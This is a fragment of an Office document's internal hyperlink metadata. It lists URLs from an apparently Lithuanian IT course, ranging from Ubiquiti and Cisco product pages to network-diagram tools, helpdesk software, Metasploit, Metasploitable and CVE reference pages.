        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://store.ui.com/collections/unifi-protect-cameras/products/unifi-video-camera-g3-bullet</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3670056</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>411</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://store.ui.com/collections/unifi-protect-cameras/products/unifi-video-camera-g3-dome</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507343</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>408</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.katalita.lt/details/ubiquiti-unifi-video-camera-nvr-2tb.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4390935</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>405</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ui.com/unifi/unifi-ap-ac-lr/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3014711</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>402</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ui.com/edgemax/edgeswitch-10xp/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293794</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>399</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ui.com/unifi-switching/unifi-switch-8/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4259927</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>396</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ui.com/unifi-routing/usg/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114178</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>393</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>390</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://app.diagrams.net/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7077920</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>387</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.networkstraining.com/best-network-diagram-software/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359400</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>384</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684706</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>381</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>458846</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/en/US/docs/switches/lan/catalyst2970/hardware/quick/guide/2970GSG2.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7078011</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>375</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/products/routers/rv160w-wireless-ac-vpn-router/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310809</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>372</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-2960-plus-series-switches/data_sheet_c78-728003.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>131156</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>369</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/products/collateral/wireless/aironet-1600-series/data_sheet_c78-715702.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655369</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/support/routers/4321-integrated-services-router/model.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684706</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>363</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114193</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>360</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dnsstuff.com/what-is-network-topology</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359400</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>357</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3539002</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>354</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tecmint.com/ip-address-management-tools-for-linux/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7798845</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>351</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tecmint.com/datacenter-server-room-assets-management-with-racktables-linux/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>131151</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>348</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tecmint.com/data-center-server-management-tools/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769494</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>345</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.predictiveanalyticstoday.com/top-free-open-source-helpdesk-software/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983067</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>342</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.softwaresuggest.com/help-desk-software/free-open-source-softwares</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752565</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>339</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.techyv.com/blog/top-10-open-source-help-desk-software/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587537</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>336</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://devopscube.com/best-opensource-monitoring-tools/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769547</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>333</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-problem-management</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2490473</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>330</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.capterra.com/incident-management-software/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3866722</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>327</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-incident-management</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3866722</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>324</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-incident-management</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046348</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>321</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://tools.kali.org/password-attacks/hydra</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3866737</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>318</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.samba.org/samba/security/CVE-2007-2447.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3342383</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>315</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752616</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>312</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.exploit-db.com/download/8572</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655384</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202009-1185</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3932205</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>306</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587579</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>303</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194407</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>300</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>196637</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>297</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5701724</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>294</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.rapid7.com/metasploit/msf-overview/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046273</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>291</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6881331</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>288</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.offensive-security.com/metasploit-unleashed/Msfconsole/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194311</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>285</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://sourceforge.net/projects/metasploitable/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735679</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>282</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://information.rapid7.com/metasploitable-download.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655426</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>279</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.rapid7.com/metasploit/metasploitable-2/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966173</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>276</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>458836</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>273</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983041</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>270</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031711</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>267</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.virtualbox.org/wiki/Downloads</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949172</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>264</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.darkwiki.in/top-5-operating-system-for-ethical-hacking-and-penetration-testing/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2621553</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>261</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://medium.com/lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589907</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>258</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.slavasoft.com/download.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4128879</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>255</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://windows.microsoft.com/en-us/windows/microsoft-services-agreement</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194330</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>252</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dropbox.com/terms2014</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063288</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>249</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.apple.com/legal/internet-services/icloud/en/terms.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4980801</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>246</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://about.pinterest.com/en/terms-service</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7733281</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>243</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://twitter.com/tos</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439576</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>240</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://instagram.com/legal/terms/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6029385</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.facebook.com/policies</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>93</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.nksc.lt/pranesti.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4456536</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>231</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://us-cert.cisa.gov/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
